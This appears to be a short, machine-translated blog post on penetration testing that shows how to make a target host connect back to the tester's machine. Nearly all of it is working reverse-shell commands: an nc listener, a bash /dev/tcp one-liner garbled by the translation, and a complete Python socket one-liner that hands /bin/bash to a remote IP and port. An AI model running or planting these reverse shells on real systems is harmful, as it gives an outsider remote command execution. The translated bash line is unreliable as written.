Disclaimer: This article is a blogger original article, shall not be reproduced without the bloggers allowed. https://blog.csdn.net/qq1124794084/article/details/87285316
In the penetration testing process, we need to shell test target rebound to our host, convenient test. For example, in order to test the injection, you can bounce shell for further testing.
A, nc and bash
Nc -lvp port on the implementation of our host
That the implementation process of the display monitor port
Performing bash -i> & / dev on the target host / tcp / ip / port 0> $ 1
So that you can execute commands on the host our
Two, nc and python
Nc -lvp port on the implementation of our host
That the implementation process of the display monitor port
The server will execute the following command
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
Note to modify ip ip and port and host port
Test results are as follows